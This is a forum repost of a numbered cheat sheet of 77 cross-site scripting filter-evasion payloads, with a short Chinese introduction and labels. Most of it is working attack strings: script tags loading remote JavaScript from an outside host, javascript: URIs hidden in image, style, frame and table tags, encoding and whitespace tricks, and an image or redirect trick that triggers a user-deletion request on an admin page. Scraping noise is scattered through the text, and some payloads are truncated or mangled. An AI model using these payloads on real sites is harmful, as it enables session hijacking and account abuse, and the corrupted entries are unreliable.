貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
h% N# J5 R% }7 n, n
9 I; m S0 v: _. o: x$ U (1)普通的XSS JavaScript注入
/ g s+ u* [; S* } <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) X5 P. E, v: \# n) o: J( S( M) n( x J# ?0 D
(2)IMG标签XSS使用JavaScript命令2 ] l. ^- e& q4 p% r) Q9 A% _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 [$ f5 Q/ p- Q* N6 O
+ A8 G* U/ B8 R) j3 i
(3)IMG标签无分号无引号
6 k- v! Y9 k- x" |; K: h: b N <IMG SRC=javascript:alert(‘XSS’)>
2 d; t# t6 c# t8 k# e
& P6 x! X' h. D% s% v (4)IMG标签大小写不敏感
; E" T+ u V7 | <IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 s& @' l0 a0 I. \% g8 m e
3 _: g5 j& ?! }5 N+ g) C' u4 J; H
(5)HTML编码(必须有分号)
4 T( n! ^4 e! c' \3 H+ Z <IMG SRC=javascript:alert(“XSS”)>
9 x7 W4 o% R `$ @
+ H4 w$ p g1 K+ N/ W* r (6)修正缺陷IMG标签+ b6 n* A0 _7 |7 j' Q# r* a
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; t+ D6 X |! X1 h
% a7 p8 Y/ G2 g: \, N( ^$ p (7)formCharCode标签(计算器) U Y6 ^% a, o4 I) v8 T
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. W2 C7 u Q" }* h- v- d8 n9 N' g4 Y* ^, F" {
(8)UTF-8的Unicode编码(计算器)
1 ^% G5 ?) w* x$ w) N <IMG SRC=jav..省略..S')>
" {7 U/ [" {6 \7 e; {: j' n8 m1 v- k1 [) A! X" u' L5 j
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
9 T& k8 A1 t, E" b <IMG SRC=jav..省略..S')>
; y6 ]/ o* p9 {1 x) h% T( b6 e
4 z+ }" J9 y G( X (10)十六进制编码也是没有分号(计算器)
$ _( N# F' y2 N7 m( |+ g# C <IMG SRC=java..省略..XSS')>2 E4 J, [4 ` k9 c7 ^* U& N
5 k8 Z) H3 v" P0 E' l4 q (11)嵌入式标签,将Javascript分开
1 \; F$ T; T# R |7 L* R! J <IMG SRC=”jav ascript:alert(‘XSS’);”>
* T& d; T2 \- [" B @9 w M' u/ [) z3 J8 N8 j2 ^0 b
(12)嵌入式编码标签,将Javascript分开8 o7 V- X' j, k
<IMG SRC=”jav ascript:alert(‘XSS’);”>. x b! ~( D, G& {7 Y9 ?* h
; e- O9 A2 g9 e2 \
(13)嵌入式换行符$ }& E6 m, O9 k0 Q3 l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( I( t* W5 P$ x( a8 T8 Y: }" l7 q. R( \ }% `; b* f
(14)嵌入式回车 i: ~3 y. J2 V% B% J+ f8 `' c! h7 o
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- P, }3 q! k8 N$ m/ P! K! q' v1 R( Z5 w* A, S4 a q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# K/ W3 x+ F/ D8 q; r) \
<IMG SRC=”javascript:alert(‘XSS‘)”>
+ [4 v+ r8 J C9 w; r+ k! a9 z+ J" P* r, t. K. E
(16)解决限制字符(要求同页面)
o0 L+ k9 u+ T6 s <script>z=’document.’</script>
) s& ^" |$ Z5 Z, u2 E. Y <script>z=z+’write(“‘</script>. P+ f8 F) J1 q F A
<script>z=z+’<script’</script>
( e: W* v2 J+ {+ t+ ~" b <script>z=z+’ src=ht’</script>
8 ^/ X7 U' ]' Z; x5 m# c <script>z=z+’tp://ww’</script>8 \6 w7 a+ h" b1 _
<script>z=z+’w.shell’</script>
, I, k0 |. C* ^8 w8 Z <script>z=z+’.net/1.’</script># f1 b2 r- [8 Q
<script>z=z+’js></sc’</script>2 ^7 I1 @3 A& ~2 O) a7 m2 s! ~
<script>z=z+’ript>”)’</script>
" ?, ?4 c$ q1 N5 C! c j7 k <script>eval_r(z)</script>
$ s1 C0 n7 R8 p/ f! t
. o4 R# A3 \* [ X# N/ a (17)空字符
7 W# a( q8 E. A& ]; y, ^ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 o* s& e( z5 s9 h0 h
- {2 ] }: f5 Y% _! @! A5 \1 l5 D (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. T6 A6 f# i U1 F6 q1 O perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ J, r9 V+ C0 B5 X v! y
8 c' u0 ]3 q# R# ?# D" Z& L
(19)Spaces和meta前的IMG标签
2 e" ~5 ]4 l' @" a+ b+ b0 [( S <IMG SRC=” � javascript:alert(‘XSS’);”>% k- e% S' b& M" X; y- y/ W' c; b* u6 R1 ^
|; \) M5 K/ [! a (20)Non-alpha-non-digit XSS0 C- A$ h) }: l
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ X6 ?* c& t- @ P, `$ z' @( g
1 f5 z# C- I! ~0 j% V2 [( T4 N
(21)Non-alpha-non-digit XSS to 2
5 Z. n* Y3 u5 {1 ]0 w. }) r& ~ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
D; t9 h+ }# h0 q8 o
5 ^- D' U0 X1 r (22)Non-alpha-non-digit XSS to 3" L' h- g, Q; X+ o/ t0 l
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 l' B4 @, n4 m6 Z7 m! g! T. m: A
) `7 p0 B) J7 F t. Y% c
(23)双开括号
& p: b! ~& e2 M' M6 ?3 p& N <<SCRIPT>alert(“XSS”);//<</SCRIPT>
; z% m3 A: `/ J8 {) {% v4 Y: W4 [- e" @9 t/ c+ @+ g
(24)无结束脚本标记(仅火狐等浏览器): j) x2 J; J8 b; K& r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ n! {3 B4 w! n( {$ ?. f3 C8 _
# b3 Q3 p. U, a+ F' w6 J g% f
(25)无结束脚本标记29 R" M9 Q& t5 N! o. W
<SCRIPT SRC=//3w.org/XSS/xss.js>
[" H% f: p0 f. P- W) Y! o$ u# U# Z/ m% X
(26)半开的HTML/JavaScript XSS
2 N: W* G. L' P: [8 J. \ <IMG SRC=”javascript:alert(‘XSS’)”
7 F0 k7 L* w4 e" l: Z4 I4 u. X+ ]9 @1 @8 J7 |9 F8 ?
(27)双开角括号
7 C4 M! \, D0 o+ l# i0 t <iframe src=http://3w.org/XSS.html <
* W8 z! r" ^2 k! p0 u0 v
4 D7 ~$ B! T7 y7 `: m2 W* ^8 I (28)无单引号 双引号 分号
; U( u4 _3 H( y& j) X9 T <SCRIPT>a=/XSS/
3 F/ s) x q# f, s" d+ U1 H alert(a.source)</SCRIPT>
- u. c+ u! Z5 z& ?2 n+ B' g+ Q& Y* g7 o1 E }! V6 t
(29)换码过滤的JavaScript! n% X" z/ ?+ T" o. F; O* y
\”;alert(‘XSS’);/// S- O: t# w' a8 W7 {
* G) W6 ?# I) _. L7 C+ X2 L (30)结束Title标签
7 M, n& h4 N/ a </TITLE><SCRIPT>alert(“XSS”);</SCRIPT># T! y5 J Z; K* \# ]
4 @) I7 j/ M$ e5 H" J" T( U (31)Input Image/ Y2 w. h% q" X, R, x) s
<INPUT SRC=”javascript:alert(‘XSS’);”>
; t) u8 g; Z2 a; W$ r4 T" F: |
& f% C1 ^& J. @ (32)BODY Image- c: u2 f( m) x M% I( A6 \
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 Y+ o- b, T9 U
) b1 e0 Z, X. s7 Y0 |$ [' p6 u (33)BODY标签9 I" T9 P. s& h# P2 G' X6 L
<BODY(‘XSS’)>
1 _& w+ z. s( m( C2 p& V. z
: h. r% ?* I1 K' {, [& O q (34)IMG Dynsrc# \2 |0 ^* r5 b; P' \$ U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 l2 X/ R1 P+ J) w
! j, l h1 S8 B* l
(35)IMG Lowsrc/ ~2 F3 @4 }4 J! @% c3 {; S' P, @
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
|# \) Y) |+ F0 i3 S+ g7 J5 N. y) K" a
(36)BGSOUND) B5 _/ }% P4 l0 G/ s$ ]: F6 K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>0 z K. ^) X2 r- y. C+ q P& E0 y
; s4 }! Z8 |+ O6 ]* j3 e (37)STYLE sheet
) j. v- ?, H# g& e: ~ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, ]1 E- H, X4 _: p4 n( t4 A) P0 }
(38)远程样式表, E1 m& H. ?9 Z( R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 I9 i0 `: B0 q& @+ @7 e+ @7 `& A
( k% B8 F, T; t- I
(39)List-style-image(列表式)
. u0 y1 _, Y( r6 B9 [ <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! ^, K# f6 w5 c- B
. I1 p5 |( V9 N% u, P4 p% R0 ? (40)IMG VBscript9 |; b Q* Y/ i5 G& x1 [* L6 L
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
q5 Y* I! Q: g& c& ~# ]* U6 {( L0 E& `; Y: L3 `$ H9 Q+ ?7 P- ` r
(41)META链接url
5 l! a' B6 |) E, ~' A9 s$ a J <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
6 e) ?" z6 a' s0 ~# b3 |- V: w8 y2 Q' n) V
(42)Iframe6 P, B, `3 z& z2 X. x
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
7 l/ x' d6 H0 W! ~# u: d$ g
8 c! z* S- T- I7 l% q9 A+ O; k: i (43)Frame
5 H) p* v. L" h: \$ \ M! f <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET># q9 q' m4 I5 ?+ v" o
2 @; O1 T( A) J- d2 k (44)Table; x! Y( n+ j* H8 x+ | b. @
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
N! {: Q$ h! H- M, a
; j$ c8 O! D8 ^3 g3 e; I (45)TD& G" B% m+ V$ A/ Q6 @+ i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& u. ] ^9 E. ~5 W7 `- K# ~) C% b/ z; T, j7 I3 ~
(46)DIV background-image
) y, D$ x# G2 X2 ~ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* @& w; J. L, i
! e+ ^% U) F7 Q' V7 ]" [- V% N (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" i# ~5 ^! e' V1 x/ o5 F n" Y% \1 u
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
( s4 ^0 s% y" U9 W2 [3 V M9 R3 V/ o; W2 z7 L/ H# ^$ A4 O' w
(48)DIV expression
- j7 |7 ~: c- M' G& A& ? <DIV STYLE=”width: expression_r(alert(‘XSS’));”>- i5 E. \3 q6 \& V3 U
4 J# {9 G6 c" O0 `
(49)STYLE属性分拆表达& u* F, r- p+ T9 Y, e" C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 @7 F! C) D5 _% t( H& v9 U3 Z; Q
# J0 {) {0 u9 V/ o: R, F (50)匿名STYLE(组成:开角号和一个字母开头)
% i( M4 X0 T: L& a& z# a <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ o$ u, D; C/ e' W1 \: C2 s1 [) A7 n9 `& O3 W/ K
(51)STYLE background-image
( J2 ?- s! J' I& \ <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 |/ A6 F; ~+ ]# M$ h/ R5 L/ N/ h9 p* G7 p/ }/ J8 D, q
(52)IMG STYLE方式
5 Z. [: n: ?0 H( h& M2 Z! u exppression(alert(“XSS”))’>
6 O/ \( m3 G. _- W
! y5 n* s) m! P (53)STYLE background1 _% t2 |: n) F
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>4 n/ c" x& M; |9 [, b
" n% G m8 @( n; J (54)BASE4 |% @: L5 e$ W' c" I0 |" K
<BASE HREF=”javascript:alert(‘XSS’);//”>
; J, z: h4 U# D# _
0 G6 R+ T9 C; ~0 ~8 U (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS. o1 h5 T6 N8 y$ a L
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( N4 z. n/ R! U7 q8 E1 a3 B
6 {4 w8 ^2 h6 q" u (56)在flash中使用ActionScrpt可以混进你XSS的代码
. f5 L0 a! r' K- A! x$ D% i a=”get”;
5 z3 H5 Q4 v& o8 a* c( b b=”URL(\”";
( G+ O4 A% e+ o$ U( C c=”javascript:”;
# u5 }1 E; g; S9 A6 I d=”alert(‘XSS’);\”)”;4 z# ~' ?7 W0 u H
eval_r(a+b+c+d);! Q( A `7 u: Z1 T9 j. F6 S# @
+ `& Q4 }6 P F2 x! K6 M* D& a! H
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上9 F& D/ K) Y/ s: z/ }/ x! x$ ~
<HTML xmlns:xss>& H$ d. C) }3 ?3 D2 F
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, m" [8 ^& |6 U9 ~$ O/ a
<xss:xss>XSS</xss:xss>& Z0 D( }) ?0 r7 L' k6 h7 y& L/ k
</HTML>
N0 L9 z% I+ I
) H4 D" ?* |1 D/ P0 L3 M (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 g# [- l, F8 b7 S9 [; f <SCRIPT SRC=””></SCRIPT>
5 O! Q/ r( u% G8 B; W2 p1 ]7 c* V3 L" Q
(59)IMG嵌入式命令,可执行任意命令; y6 O8 T4 I' X( l, v
<IMG SRC=”http://www.XXX.com/a.php?a=b”># e1 _3 G7 M& z1 [
3 N2 `/ g+ U7 K! S3 j9 C8 ^+ F+ I (60)IMG嵌入式命令(a.jpg在同服务器), J. e) ]1 r4 D% I5 I& t" H1 E
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
+ L0 ^+ f- D. K* a' O5 Z8 x C5 t0 S8 \& B; r! s
(61)绕符号过滤4 w" Q8 q. z3 c! h; ^1 u* c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: `# @5 t" f" J
2 p# k1 `2 m" q* ]; G4 |8 t) | (62)
" t R# O9 M6 e* z <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% n2 P0 J- @0 h/ n0 o) I) e" I( I- b: i+ ^# |* N) n# [ P
(63), ~4 j Q5 X6 p' {; P
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 b' d# O& ~1 W9 Z) g1 t
7 F% o! j; t& N+ R3 K$ Q) j
(64)
0 U5 ?6 S. Z' z2 c6 V <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> A# @$ K& v" B0 j, g
$ K0 b t' t$ a' f- q! F. ^9 R% K (65)
4 G+ J, K; {1 ]- S% e# t! } <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 u$ D- u+ Z4 Z6 n2 L$ c- M
- T" L0 C3 U& C( R, j4 y% C% E2 ? (66)
) P. [0 B# R3 O6 I8 H' g9 a( W <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" J$ ^# Y3 G; @& R9 {2 m
3 h" I* F8 F* N
(67)
/ f, G; Z7 [0 V' V% L <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
: r) M7 t9 R, }" W% l5 R5 I- {9 @7 O& J) Q3 W( }
(68)URL绕行+ v4 A0 u9 w3 N- Z2 Z
<A HREF=”http://127.0.0.1/”>XSS</A>
0 `3 p4 L( K+ m9 @: `0 Q3 U) x+ j# ?4 }) Q0 ^4 R8 `* F
(69)URL编码
N# P+ u7 n& z6 _ <A HREF=”http://3w.org”>XSS</A>3 j) x/ }) ]3 I0 v6 q" c
8 a" `. f) [/ c& l
(70)IP十进制
2 r. S" \5 n8 Q, ^3 D9 U# m+ _ <A HREF=”http://3232235521″>XSS</A>) g5 S! o9 F" ^1 z, Y( U+ x% _/ v
5 E% h. `9 t: u1 E# ?* ^ (71)IP十六进制1 x: z; f; l' ]' \/ b
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 M" E7 y2 T1 T
/ Y7 M8 |2 u. A" Z4 |" d
(72)IP八进制4 Q; r, v0 V3 h0 ?0 E8 o$ ]
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ s: `, M- g2 @# d
% m9 `* O# f4 j; Z (73)混合编码/ A/ D+ b( D j
<A HREF=”h
: C( V9 V# w! |* _! D0 ~) H& Y tt p://6 6.000146.0×7.147/”">XSS</A> B W4 S/ {, G3 ^
7 u O( ?3 k) G
(74)节省[http:]5 l3 S/ V# Y$ m& j
<A HREF=”//www.google.com/”>XSS</A># \# l1 j, Q3 n" m( i' r
) T& e. {0 C8 |( [9 f (75)节省[www]
2 u4 w ^" j( f g; C <A HREF=”http://google.com/”>XSS</A>
( h* h7 O' g& C1 t: T* d8 v6 l1 d+ }
% i! S* I5 G' q* T (76)绝对点绝对DNS
5 y/ |# y! e2 b4 U <A HREF=”http://www.google.com./”>XSS</A>
; N% M9 J! @; j2 p7 k; \. l+ @, o+ N5 B/ z: Q; |
(77)javascript链接4 b5 N1 G( \7 K; L$ W$ p
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对